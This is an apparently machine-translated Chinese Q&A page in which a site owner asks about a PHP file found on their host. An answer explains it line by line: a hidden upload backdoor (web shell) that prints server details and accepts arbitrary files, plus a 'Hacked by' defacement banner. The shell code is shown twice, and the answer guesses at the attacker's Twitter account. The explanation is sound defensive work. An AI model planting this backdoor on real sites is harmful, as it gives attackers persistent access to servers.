我刚刚在我的托管上发现了一些php文件,在php中有0.01%的知识,有人可以解释一下这段代码的作用吗?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
答案 0 :(得分:11)
如果查询字符串中的变量具有值(即index.php?ourzr=set
)
<?php
if(isset($_GET["ourzr"])){
然后使用函数php_uname()
显示有关服务器操作系统的信息。他们使用此信息将下一轮攻击定位到您的系统细节。
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
创建一个允许上传更多黑客文件的html表单
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
如果文件已上传,请将文件从临时文件夹复制到普通文件夹,不带临时名称但原始名称
if($_POST["v"]==up){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
这部分只是一个小小的消息,说“我是来自歹徒队员的kool脚本小子”
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
尽快删除此文件
此脚本以某种方式通过可能仍然存在的漏洞上传到您的服务器(除非黑客足够好以便为您修复)。
他们发现将这一个文件放在您可以访问它的服务器上,现在他们想用它来继续上传脚本和其他恶意数据。删除此文件,并查看网站上传任何类型文件的任何位置。
了解黑客如何使用文件上传来上传这些脚本,以及他们可以使用自己的上传表单执行的其他操作: https://www.acunetix.com/websitesecurity/upload-forms-threat/
了解如何创建安全上传脚本:There are many other tutorials
阅读有关安全性的更多信息,并尝试学习一些PHP。如果您有任何更具体的问题,请告诉我
我猜这个家伙:https://twitter.com/d3b_x